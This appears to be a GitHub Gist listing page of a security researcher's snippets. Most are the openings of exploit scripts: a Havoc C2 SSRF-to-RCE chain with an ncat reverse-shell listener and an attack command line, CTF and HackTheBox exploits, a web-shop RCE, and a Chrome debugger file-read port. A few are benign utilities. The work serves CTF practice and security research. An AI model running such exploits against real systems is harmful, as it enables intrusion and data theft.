This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Havoc C2 SSRF to AuthN RCE | |
# @author longcat (https://sth.sh) | |
# | |
# sudo ncat -lvp 443 | |
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L | |
# | |
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE) | |
# Their writeups are great. I am so fascinating to read @_chebuya blog post :) | |
# My work is just to integrate them into one single shot exploit. | |
# In short, make WebSocket works with Havoc C2 Agent Payload |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# @author: longcat | |
# SEC Playground Bloody Xmas 2024 - Bookclub | |
# Exploit #2 - Read Flag w/ RCE (Reverse Shell) | |
import requests | |
import sys | |
import time | |
import argparse | |
import urllib3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564) | |
import requests | |
import random | |
import string | |
import urllib.parse | |
from base64 import b64encode,b64decode | |
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Compiled list of my common bloodhound-python problems & solutions | |
Bloodhound-python Error #0 | |
You do not get info like GPO and permission abuse edges. | |
You need to add option -> -c All,LoggedOn | |
Bloodhound-python Error #1 | |
raise NoNameservers(request=self.request, errors=self.errors) | |
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# A numeric lock has a 3 digit key | |
# "682" - One number is correct and well placed | |
# "614" - One number is correct but wrongly placed | |
# "206" - Two number are correct but wrongly placed | |
# "738" - Nothing is correct | |
# "780" - One number is correct but wrongly placed | |
from z3 import * | |
# Create three integer variables for the lock digits |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# I tried all jadx options for debof, but it did not work. | |
# This script can be used to replace strings.xml values in a target Java file | |
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) { | |
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire | |
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java | |
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources | |
import xml.etree.ElementTree as ET | |
import re | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env zsh | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ansible's Vultr module is suck. I have built my own. | |
# Nuke all my Vultr instances | |
ssh_key=$(cat ~/.ssh/id_ed25519_vultr.pub) | |
echo $ssh_key | |
# List Instances | |
curl "https://api.vultr.com/v2/instances" \ | |
-X GET \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/zsh | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# https://tryhackme.com/room/lookingglass | |
# 10.10.169.23 | |
function ssh_connect { | |
ssh root@10.10.169.23 -p $1 2>/dev/null | grep -q 'Higher' && echo "Higher" && exit 0 | |
echo "Lower" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# 2023-03-07 | |
# Weed Shop RCE Exploit | |
import requests | |
def create_dbfile(filename): | |
# Vulnerability 1: IP Spoofing | |
# File: function.php |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
# pip install requests websocket-client python-socks | |
# This exploit code can be used to read arbitrary files on the victim machine with | |
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
import requests | |
import json | |
import urllib3 | |
import websocket |
NewerOlder